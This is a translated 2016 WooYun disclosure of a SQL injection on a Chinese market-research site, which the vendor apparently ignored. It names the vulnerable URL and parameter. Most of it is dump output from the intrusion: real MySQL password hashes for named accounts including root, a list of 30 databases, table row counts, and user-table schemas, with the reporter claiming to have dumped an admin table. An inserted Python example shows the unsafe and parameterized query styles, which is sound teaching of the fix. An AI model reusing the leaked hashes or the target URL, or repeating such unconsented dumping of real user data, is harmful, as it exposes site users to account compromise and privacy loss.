
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0194624

Title: SQL injection on the 市场信息研究网 main site exposes 500K+ user records across the whole site (ROOT account, UNION cross-database queries possible)

Related vendor: 市场研究信息网

Author: Exploit DB

Submitted: 2016-04-11 09:39

Fix deadline: 2016-05-26 09:40

Published: 2016-05-26 09:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted or actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-04-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-05-26: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

China's leading market research portal; 30 databases affected

Detailed description:

http://app.3see.com/job/public/post.php?pid=2960
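The injection point above is an integer `pid` query parameter that ends up inside a SQL statement. The report gives no fix, so the following is an added example (not code from the original report or from the site) showing the two sides of the issue: a handler that pastes the raw parameter into SQL text, and the corrected handler that validates the type and binds the value as a query parameter. SQLite stands in for the site's MySQL, and the `post` table and its rows are constructed sample data, not the site's real schema; the same pattern applies to PHP via PDO or mysqli prepared statements.

```python
"""Added example: string-built query vs. validated, parameterized query for an
integer ``pid`` parameter. Uses an in-memory SQLite table with constructed rows."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a small in-memory table standing in for a job-post table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE post (pid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO post VALUES (?, ?)",
        [(2960, "Senior analyst"), (2961, "Survey interviewer"), (2962, "Data clerk")],
    )
    conn.commit()
    return conn


def get_post_unsafe(conn: sqlite3.Connection, pid: str) -> list:
    """The defect: the raw query-string value becomes part of the SQL text, so
    anything the client appends to ``pid`` is parsed as SQL."""
    sql = "SELECT pid, title FROM post WHERE pid = " + pid
    return conn.execute(sql).fetchall()


def get_post_safe(conn: sqlite3.Connection, pid: str) -> list:
    """The fix: reject anything that is not a plain integer, then bind the value
    as a parameter so the driver never treats it as SQL syntax."""
    if not pid.isdigit():
        raise ValueError("pid must be an integer")
    sql = "SELECT pid, title FROM post WHERE pid = ?"
    return conn.execute(sql, (int(pid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("safe, valid pid:   ", get_post_safe(db, "2960"))
    print("unsafe, tainted pid:", get_post_unsafe(db, "2960 OR 1=1"))
    try:
        get_post_safe(db, "2960 OR 1=1")
    except ValueError as exc:
        print("safe, tainted pid:  rejected:", exc)
```

Parameter binding alone closes the injection; the integer check is a second layer that also gives a clear error for malformed input. The report's title points at a separate defect worth fixing at the same time: the application connected as the MySQL root account, which is why one injection reached all 30 databases and the `mysql` user table's password hashes. An application account granted privileges only on its own database confines a future injection to that database.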


database management system users password hashes:
[*] 3seeroot [3]:
password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
password hash: *DF23C7658CA68A644959B4DE7C7A0E12328F94BD
password hash: *E30B1F9102F0C1B751E96316EF6C2A859436EC5C
[*] ailon [1]:
password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
[*] cti_fbxt [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] doosan [1]:
password hash: *02839BAECB5BEB57BE071190FF2E70701BF66FB1
[*] fbxt [1]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] pureftpd [1]:
password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
[*] root [1]:
password hash: *2D788DA8CDAE073D0DDB453E628EA003D8CDE85C
[*] skw [1]:
password hash: *FC60E807774B9731F82DBC0CDA1159DC6494C95D
[*] wyt [1]:
password hash: *64DF5C732B2AD96E34B95E4571C54011D342D7E5


[Screenshot: QQ截图20160403232405.png]


30 databases affected

available databases [30]:
[*] 3see
[*] 3seedb
[*] 3seeforum
[*] ailon
[*] air
[*] bbs
[*] bbs7vuchome
[*] blog
[*] boblog
[*] cti_fbxt
[*] discuz
[*] doosan
[*] fbxt
[*] fenghui
[*] fenghui08
[*] info
[*] information_schema
[*] kstory
[*] mysql
[*] mysql__
[*] new3see
[*] newyearwork
[*] pku_bbs
[*] pureftpd
[*] reportdata
[*] sgbbs
[*] sgblog
[*] skw_bbs
[*] skw_member
[*] space


The current database does not hold much data, just 1000+

Database: 3see
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| t_makepagelog | 247155 |
| cms_data_comment | 145038 |
| payreport | 24432 |
| cms_data | 22338 |
| cms_create_log | 16043 |
| cojob_inbox | 12335 |
| t_filelog | 8966 |
| call_datasheet | 8525 |
| myjob_edu | 6382 |
| stat_sheet3see | 6305 |
| myjob_oldjob | 6298 |
| cms_data_picture | 6271 |
| myjob_resume | 5342 |
| freereports | 4061 |
| g_book | 3821 |
| myjob_item | 3250 |
| media_datasheet | 2890 |
| passwordtable | 2573 |
| manufacturer_new | 2498 |
| manufacturer | 2192 |
| cojob_place_new | 1798 |
| com_user | 1348 |
| members_homepage | 1331 |
| en_payreport | 1210 |
| com_manufacturer | 1117 |
| `3seecojob_coinfo` | 1112 |
| m_company | 1082 |
| m_user | 1069 |
| myjob_favorite | 968 |
| bidding | 773 |
| manu_art | 728 |
| com_homepages | 715 |
| com_bidding | 674 |
| com_book | 662 |
| orders | 633 |
| cms_page_module | 603 |
| cojob_store | 558 |
| myjob_city | 505 |
| myjob_letter | 489 |
| user_report | 435 |
| userdree | 433 |
| trainingtable | 393 |
| t_log | 391 |
| manu_art_pic | 366 |
| pv_stat | 354 |
| myjob_search | 346 |
| `3seemrarticle` | 342 |
| lib_mrarticle | 321 |
| mrconews | 319 |
| cms_topic_data | 318 |
| com_news | 297 |
| cojob_place | 256 |
| training | 246 |
| payreport_co | 192 |
| settlement | 152 |
| `3seesoftsurveyother` | 141 |
| newpic | 124 |
| company_job | 123 |
| diaocha2009 | 115 |
| myjob_mymsg | 113 |
| manu_friends | 104 |
| cms_page | 96 |
| new_hyclass | 96 |
| cms_data_type | 93 |
| library_datasheet | 90 |
| manufacturer_inform | 87 |
| cojob_deptandplace | 84 |
| cms_structure | 80 |
| t_menu | 71 |
| cojob_sessions | 65 |
| myjob_posttype | 63 |
| inquiry | 45 |
| p_commentary | 45 |
| ads_aditempic | 44 |
| cms_data_file | 38 |
| shclass | 36 |
| manufacturer_moban | 34 |
| training_qy_name | 33 |
| ads_aditem | 32 |
| advertisement | 30 |
| `3seehyclass` | 29 |
| adcategory | 29 |
| com_hyclass | 29 |
| m_admin | 24 |
| mrarticleclass | 24 |
| uparticle | 23 |
| com_uparticle | 22 |
| myjob_black | 20 |
| cati_literature | 16 |
| cms_topic | 16 |
| manufacturer_dongtai | 16 |
| mrarticle_neikan | 16 |
| cms_topic_comment | 15 |
| lib_topic | 14 |
| training_j | 14 |
| anli_down | 12 |
| cms_survey_item | 12 |
| mrarticle_zazhi | 12 |
| t_menuclass | 12 |
| t_power | 12 |
| trainingclass | 12 |
| cms_nextid | 11 |
| m_userinfo | 11 |
| manufacturer_anli | 11 |
| t_user | 11 |
| bytuijian | 10 |
| orderspayreport | 10 |
| ads_class | 9 |
| cms_default_module | 8 |
| com_seccanli | 8 |
| seccanli | 8 |
| training_xilie | 7 |
| com_anli | 6 |
| com_dongtai | 6 |
| cms_topic_group_type | 5 |
| cati_downloads | 4 |
| cati_softintro | 4 |
| cati_trends | 3 |
| cms_survey_main | 3 |
| cms_survey_position | 3 |
| manu_floatad | 3 |
| manufacturer_mbclass | 2 |
| cms_topic_group | 1 |
| tex | 1 |
| wytad_count | 1 |
+-----------------------+---------+


Dumped all of the admin table directly

[Screenshot: QQ截图20160403232405.png]


Looking at the other databases

Database: 3seedb
[122 tables]
+-------------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advcaches |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_campaigns |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favorites |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_linkheader |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_uc_admins |
| cdb_uc_applications |
| cdb_uc_badwords |
| cdb_uc_domains |
| cdb_uc_failedlogins |
| cdb_uc_feeds |
| cdb_uc_friends |
| cdb_uc_mailqueue |
| cdb_uc_memberfields |
| cdb_uc_members |
| cdb_uc_mergemembers |
| cdb_uc_newpm |
| cdb_uc_notelist |
| cdb_uc_pms |
| cdb_uc_protectedmembers |
| cdb_uc_settings |
| cdb_uc_sqlcache |
| cdb_uc_tags |
| cdb_uc_vars |
| cdb_usergroups |
| cdb_validating |
| cdb_videos |
| cdb_videotags |
| cdb_virtualforums |
| cdb_warnings |
| cdb_words |
| textt |
+-------------------------+


390K+ user records

[Screenshot: QQ截图20160403232405.png]


Database: 3seedb
Table: cdb_uc_members
[12 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| email | char(32) |
| lastloginip | int(10) |
| lastlogintime | int(10) unsigned |
| myid | char(30) |
| myidkey | char(16) |
| password | char(32) |
| regdate | int(10) unsigned |
| regip | char(15) |
| salt | char(6) |
| secques | char(8) |
| uid | mediumint(8) unsigned |
| username | char(15) |
+---------------+-----------------------+
Database: 3seedb
Table: cdb_members
[48 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| accessmasks | tinyint(1) |
| adminid | tinyint(1) |
| avatarshowid | int(10) unsigned |
| bday | date |
| credits | int(10) |
| customaddfeed | tinyint(1) |
| customshow | tinyint(1) unsigned |
| dateformat | tinyint(1) |
| digestposts | smallint(6) unsigned |
| editormode | tinyint(1) unsigned |
| email | char(40) |
| extcredits1 | int(10) |
| extcredits2 | int(10) |
| extcredits3 | int(10) |
| extcredits4 | int(10) |
| extcredits5 | int(10) |
| extcredits6 | int(10) |
| extcredits7 | int(10) |
| extcredits8 | int(10) |
| extgroupids | char(20) |
| gender | tinyint(1) |
| groupexpiry | int(10) unsigned |
| groupid | smallint(6) unsigned |
| invisible | tinyint(1) |
| lastactivity | int(10) unsigned |
| lastip | char(15) |
| lastpost | int(10) unsigned |
| lastvisit | int(10) unsigned |
| newsletter | tinyint(1) |
| oltime | smallint(6) unsigned |
| pageviews | mediumint(8) unsigned |
| password | char(32) |
| pmsound | tinyint(1) |
| posts | mediumint(8) unsigned |
| ppp | tinyint(3) unsigned |
| prompt | tinyint(1) |
| regdate | int(10) unsigned |
| regip | char(15) |
| secques | char(8) |
| showemail | tinyint(1) |
| sigstatus | tinyint(1) |
| styleid | smallint(6) unsigned |
| timeformat | tinyint(1) |
| timeoffset | char(4) |
| tpp | tinyint(3) unsigned |
| uid | mediumint(8) unsigned |
| username | char(15) |
| xspacestatus | tinyint(1) |
+---------------+-----------------------+


Database: discuz
[53 tables]
+--------------------+
| cdb_access |
| cdb_adminactions |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachments |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_blogcaches |
| cdb_buddys |
| cdb_creditslog |
| cdb_failedlogins |
| cdb_favorites |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forums |
| cdb_medals |
| cdb_memberfields |
| cdb_members |
| cdb_moderators |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_plugins |
| cdb_pluginvars |
| cdb_pms |
| cdb_polls |
| cdb_posts |
| cdb_profilefields |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtypes |
| cdb_usergroups |
| cdb_validating |
| cdb_words |
+--------------------+


90K+ user records

[Screenshot: QQ截图20160403232405.png]


Database: bbs
+------------------+---------+
| Table | Entries |
+------------------+---------+
| cdb_posts | 8084 |
| cdb_threads | 7461 |
| cdb_spacecaches | 2708 |
| cdb_memberfields | 543 |
| cdb_members | 543 |
| cdb_memberspaces | 542 |
| cdb_rsscaches | 461 |
| cdb_myposts | 258 |
| cdb_settings | 221 |
| cdb_mythreads | 126 |
| cdb_statvars | 75 |
| cdb_stylevars | 52 |
| cdb_stats | 50 |
| cdb_faqs | 34 |
| cdb_forumfields | 30 |
| cdb_forums | 29 |
| cdb_smilies | 29 |
| cdb_usergroups | 16 |
| cdb_crons | 13 |
| cdb_magics | 12 |
| cdb_projects | 11 |
| cdb_medals | 10 |
| cdb_bbcodes | 7 |
| cdb_onlinetime | 7 |
| cdb_ranks | 5 |
| cdb_onlinelist | 4 |
| cdb_admingroups | 3 |
| cdb_failedlogins | 1 |
| cdb_forumlinks | 1 |
| cdb_styles | 1 |
| cdb_templates | 1 |
+------------------+---------+


Some user records here as well

[Screenshot: QQ截图20160403232405.png]


Altogether this should come to 500K

Proof of vulnerability:

Suggested fix:

Copyright notice: when reposting, please credit the source: Exploit DB@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted or actively declined the report

Vulnerability Rank: 15 (WooYun assessment)